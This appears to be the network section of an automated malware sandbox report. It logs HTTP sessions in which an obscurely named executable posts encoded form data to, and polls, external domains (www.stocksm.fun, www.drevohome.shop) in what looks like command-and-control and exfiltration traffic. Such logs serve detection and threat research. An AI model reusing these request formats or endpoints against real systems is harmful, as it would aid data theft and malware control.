                                                                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.657328217.70.184.50802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:13.163052082 CEST769OUTPOST /0bvj/ HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.stocksm.fun
                                                                                                                          Referer: http://www.stocksm.fun/0bvj/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 67 2f 59 52 56 71 4d 73 69 59 77 4c 77 2b 30 64 39 64 57 78 73 2f 37 2f 51 72 31 67 70 36 36 69 37 65 61 54 7a 73 4a 73 33 6e 67 75 32 53 71 4f 55 68 4c 66 51 71 31 6f 43 54 31 38 34 4a 44 39 78 66 44 49 77 48 44 38 70 78 71 65 75 76 6d 6e 31 73 34 54 77 4f 59 38 6a 50 35 55 32 71 34 4c 75 79 47 44 53 49 6b 36 5a 30 30 6d 71 35 6f 45 46 78 59 64 55 48 57 43 6e 78 49 77 51 42 73 43 45 64 71 6b 79 4c 39 61 6a 6f 4d 76 2b 66 2f 2b 30 53 72 4a 69 74 6d 36 6f 52 63 66 39 2b 68 73 33 32 46 49 72 6c 78 68 59 59 78 70 76 38 4d 78 7a 4c 59 52 69 6c 75 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJIg/YRVqMsiYwLw+0d9dWxs/7/Qr1gp66i7eaTzsJs3ngu2SqOUhLfQq1oCT184JD9xfDIwHD8pxqeuvmn1s4TwOY8jP5U2q4LuyGDSIk6Z00mq5oEFxYdUHWCnxIwQBsCEdqkyL9ajoMv+f/+0SrJitm6oRcf9+hs32FIrlxhYYxpv8MxzLYRilug==
                                                                                                                          Oct 21, 2024 17:26:13.709779024 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:13 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.657329217.70.184.50802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:15.710289955 CEST1782OUTPOST /0bvj/ HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.stocksm.fun
                                                                                                                          Referer: http://www.stocksm.fun/0bvj/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 71 39 57 37 57 73 4e 62 69 68 70 33 69 70 52 35 6a 58 5a 30 56 51 4f 65 35 44 71 63 74 59 42 38 62 78 62 75 38 76 6c 4a 49 34 2f 45 30 42 71 50 4b 71 59 78 4c 77 2b 39 39 39 63 57 78 73 59 37 2f 35 73 31 67 6c 4d 36 6b 33 65 63 31 50 73 65 4f 66 6e 31 65 32 53 31 2b 55 69 56 76 52 33 31 6f 53 70 31 39 45 4a 44 39 78 66 44 4a 41 48 45 70 46 78 6c 2b 75 77 73 48 30 2b 38 54 78 70 59 38 72 66 35 55 79 36 2f 2f 61 79 49 44 43 49 6c 50 4e 30 34 6d 71 37 72 45 46 70 59 64 51 59 57 43 37 62 49 77 4e 6b 73 42 59 64 72 68 4b 49 6c 37 7a 7a 51 73 57 49 67 75 6f 73 6d 76 32 48 6d 4a 63 79 63 70 78 32 6d 59 33 64 4f 64 4c 47 6c 51 42 4b 35 59 4f 64 45 6e 65 4d 56 68 7a 75 35 5a 41 45 2f 37 34 4a 4d 45 6a 66 6e 35 52 45 43 70 46 4b 44 42 62 75 70 4f 4d 6d 5a 71 33 4b 4a 50 6a 48 33 7a 31 70 6f 47 79 53 71 57 4a 71 43 41 51 78 73 30 52 6d 37 34 56 76 47 35 54 55 66 50 4f 6c 59 6c 36 52 35 77 71 75 59 7a 56 54 4b 4a 31 54 73 51 4b 53 5a 42 74 38 63 73 31 2b 6d 51 65 31 76 79 6c 35 36 46 50 64 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=Eq9W7WsNbihp3ipR5jXZ0VQOe5DqctYB8bxbu8vlJI4/E0BqPKqYxLw+999cWxsY7/5s1glM6k3ec1PseOfn1e2S1+UiVvR31oSp19EJD9xfDJAHEpFxl+uwsH0+8TxpY8rf5Uy6//ayIDCIlPN04mq7rEFpYdQYWC7bIwNksBYdrhKIl7zzQsWIguosmv2HmJcycpx2mY3dOdLGlQBK5YOdEneMVhzu5ZAE/74JMEjfn5RECpFKDBbupOMmZq3KJPjH3z1poGySqWJqCAQxs0Rm74VvG5TUfPOlYl6R5wquYzVTKJ1TsQKSZBt8cs1+mQe1vyl56FPdA4kykif2vjvnsqutdJ8wVu78Hs1uHGTjEa6vF8lZWFDGBd/Y47XsC30FwrpvJBAKOXyaJIc1Np0FqHqf5C3ALiESIrU7doT7A82eu20kmoaA47xBBWXegeUbDsJm6d+qTMfps+dA5JQ3RIgIKrUTPE5VJb8tj8FltMqZShpFneZzTV3dp71KpnbZBOycNk+8n0n9Jf//z3Sgt6mehW5+0bi3dmaMfZSughl/KcYCpv1SrnRloCcnq8cULuqpWkZaG6Drtm3DyFXIPUTRfrO3JWAKHhfRjZFdPx2plVSTy3G9UvxgP/10sNcrA1lrTtPuTjiYfSPTVpVu2N/2FGtqAQ4D/mpTYbDMvV0e3F+V0XFDYbILa1UGVBrUBSKZPxe4e+JQwhjQNMy8uPAUsfpUIrmpd1Qfr6IG3C9x9U0VMtpoj0NA30Y5Xj19WLWKYe8s0/gNZ8ypeqkbWfzEQN0ZHd+pYnXCGs1s/wT/Nw7kYUklia773wZa9MTWNJw64MzFWz7LBZbGQBrl7CNNSi2XkOEEtHLQSF0T/r8P39cirR9JYtDEpY4786Z7Bo5zbHGyg5WC2JhDWBbRcGVOzcDZprkvmO0TrvU5YBclUKcVXXstFUduFNyZIaP0KxsPuJqwv31DbICOXlbwDzJdXWbL5xDtXs3bh8Q5PC [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:26:16.281411886 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.657330217.70.184.50802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:18.250752926 CEST494OUTGET /0bvj/?DJ=uNx48jdPyvmhqtM0&qFHlI=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYh+a9+td3GPcpjeWl06kCA+p4W4MdKq1Fwo+I6zMR0Ax5A/L5wR0= HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:26:18.810642004 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:18 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Language
                                                                                                                          Data Raw: 37 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                          Data Ascii: 779<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>stocksm.fun</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whoi [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:26:18.810723066 CEST878INData Raw: 73 6d 2e 66 75 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 73 74 6f 63 6b 73 6d 2e 66 75 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61
                                                                                                                          Data Ascii: sm.fun"><strong>View the WHOIS results of stocksm.fun</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-bord


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.65733394.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:23.979671001 CEST754OUTPOST /v2k8/ HTTP/1.1
                                                                                                                          Host: www.drevohome.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.drevohome.shop
                                                                                                                          Referer: http://www.drevohome.shop/v2k8/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 7a 4f 30 72 55 75 37 35 72 57 69 62 42 76 76 2f 64 38 4b 76 79 62 6e 49 45 5a 5a 74 55 31 38 47 76 33 35 4f 34 53 6e 33 59 70 49 58 74 44 37 5a 43 69 36 56 34 4f 30 33 34 42 47 4b 79 46 48 72 35 61 4f 6b 75 77 42 51 30 71 4c 41 42 78 6f 49 62 4c 59 71 75 4f 77 44 61 46 2f 63 51 42 38 61 65 6d 41 48 48 45 56 46 75 71 2b 38 74 33 75 6c 43 41 67 77 36 4d 55 78 56 58 36 6b 77 6b 47 41 52 70 78 4a 6e 61 5a 78 30 56 33 68 34 78 48 74 4a 52 4c 75 41 31 67 6d 51 6b 37 2b 69 31 6c 78 61 42 53 5a 51 62 61 64 44 71 79 50 58 64 36 35 47 7a 75 30 71 39 57 4a 55 76 36 72 4d 75 70 46
                                                                                                                          Data Ascii: qFHlI=aRJkG/xjeaxIzO0rUu75rWibBvv/d8KvybnIEZZtU18Gv35O4Sn3YpIXtD7ZCi6V4O034BGKyFHr5aOkuwBQ0qLABxoIbLYquOwDaF/cQB8aemAHHEVFuq+8t3ulCAgw6MUxVX6kwkGARpxJnaZx0V3h4xHtJRLuA1gmQk7+i1lxaBSZQbadDqyPXd65Gzu0q9WJUv6rMupF


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.65733494.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:26.518501043 CEST778OUTPOST /v2k8/ HTTP/1.1
                                                                                                                          Host: www.drevohome.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.drevohome.shop
                                                                                                                          Referer: http://www.drevohome.shop/v2k8/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 49 47 76 54 78 4f 35 57 54 33 62 70 49 58 31 54 37 6d 4d 43 37 62 34 4f 34 4a 34 45 2b 4b 79 46 54 72 35 62 2b 6b 75 6e 74 50 31 36 4c 4f 48 78 6f 4f 52 72 59 71 75 4f 77 44 61 46 72 32 51 42 30 61 65 57 77 48 56 6c 56 4b 6f 61 2b 2f 37 48 75 6c 47 41 67 30 36 4d 55 54 56 54 36 65 77 6d 75 41 52 72 70 4a 70 72 5a 79 2b 56 33 6e 32 52 47 61 41 54 36 63 5a 47 77 6b 62 69 7a 54 35 6d 70 33 53 58 54 44 4d 6f 61 2b 52 36 53 4e 58 66 69 4c 47 54 75 65 6f 39 75 4a 47 34 32 4d 44 61 4d 6d 31 50 6d 32 78 6d 37 65 41 62 55 37 34 35 42 78 75 77 78 6d 54 67 3d 3d
                                                                                                                          Data Ascii: qFHlI=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHIGvTxO5WT3bpIX1T7mMC7b4O4J4E+KyFTr5b+kuntP16LOHxoORrYquOwDaFr2QB0aeWwHVlVKoa+/7HulGAg06MUTVT6ewmuARrpJprZy+V3n2RGaAT6cZGwkbizT5mp3SXTDMoa+R6SNXfiLGTueo9uJG42MDaMm1Pm2xm7eAbU745BxuwxmTg==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.65733594.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:29.065884113 CEST1791OUTPOST /v2k8/ HTTP/1.1
                                                                                                                          Host: www.drevohome.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.drevohome.shop
                                                                                                                          Referer: http://www.drevohome.shop/v2k8/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 51 47 76 68 70 4f 34 78 50 33 61 70 49 58 72 44 37 6a 4d 43 36 48 34 4b 55 56 34 45 43 77 79 47 72 72 34 35 32 6b 35 43 5a 50 37 36 4c 4f 4b 52 6f 4c 62 4c 59 37 75 4b 73 48 61 46 37 32 51 42 30 61 65 55 6f 48 51 45 56 4b 71 61 2b 38 74 33 75 70 43 41 68 68 36 4d 4e 73 56 54 33 70 7a 58 4f 41 52 4c 35 4a 72 5a 78 79 6b 56 33 6c 31 52 47 43 41 54 32 48 5a 47 74 62 62 69 76 35 35 6b 31 33 44 77 75 37 65 4d 65 6f 44 37 57 79 42 75 47 2f 4f 30 71 68 74 4b 43 72 41 36 4b 5a 41 5a 41 4b 77 49 65 78 30 6d 79 37 4d 72 6f 6d 2f 76 6b 41 6d 45 38 2f 4e 50 44 59 39 63 50 7a 73 64 35 46 2f 41 65 32 67 34 68 4f 52 64 66 67 39 34 51 39 6c 49 66 77 73 4c 6f 65 79 71 61 32 6e 75 63 64 2f 4c 37 2b 2f 77 58 57 6c 2f 4a 52 38 33 76 33 4a 71 48 6b 32 65 67 58 4c 36 6b 76 31 44 34 32 57 55 72 79 65 50 6e 6f 5a 55 6a 73 6b 4b 6a 74 57 75 4f 39 4c 79 50 49 79 30 31 71 6a 69 56 75 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHQGvhpO4xP3apIXrD7jMC6H4KUV4ECwyGrr452k5CZP76LOKRoLbLY7uKsHaF72QB0aeUoHQEVKqa+8t3upCAhh6MNsVT3pzXOARL5JrZxykV3l1RGCAT2HZGtbbiv55k13Dwu7eMeoD7WyBuG/O0qhtKCrA6KZAZAKwIex0my7Mrom/vkAmE8/NPDY9cPzsd5F/Ae2g4hORdfg94Q9lIfwsLoeyqa2nucd/L7+/wXWl/JR83v3JqHk2egXL6kv1D42WUryePnoZUjskKjtWuO9LyPIy01qjiVuXVsc+zz34qjKfwfPP7tOdloFZAwftygU/HV1wVwUkJDgPHIRGp223IjtYTazwQJco45Qq3e5WsKXRCHMJf0GLJ2IWt//MOeQTeQT5tM31aY4MuwQM74BSCx3+7MhIXPF/4t0T4rEdeOTB/hIZ4r/KHC9ycQNow3OgsStuSgDj/pOu0inRiQWX6au9ejKXhBz6ECdA07SLQr3yP9LqV5bGBi0sdharDnL4E8JVMDrMF7qVTsfsxz1Julswb3Ri7TSBAMicddjf6VAhrZHuv+2sCqRv2fAS65hnzkIStPkNvJAaP0mPDP3vptZ5lAu8LTKFJ2FZdA9VgMwXpxI9lUGtki5k2TL8ydpUEcPi3CDCr9yn23eROYjzi6oZrZuNTD8/8zjgTjNsLTmO8NwKeBXJ6rX4FI3VmN58jo+TKPJ1hlwUSML3jqAoPFCYV0JFAK818HH4NkFGJGmE84EM1R3Ee0Qvo8XjS1Vz2t7by4HRbufhlPCd2tWcv6AtxYxpaLw8HfUwLAEaSnMUiPeIXKOqx+qKhTVlCkY+VdlaBRvHnJsOmEleOGL8+dumfdqATR5VygVQKii1spjH7Fmy8HubKWCh94prOs3RNhab2UYLhLKJ3KALSE9UQiHORrxF6ocorvtz0ATOn5Y0osAVWjfw5vtI/9kgutNwC [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.65733694.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:31.618628025 CEST497OUTGET /v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.drevohome.shop
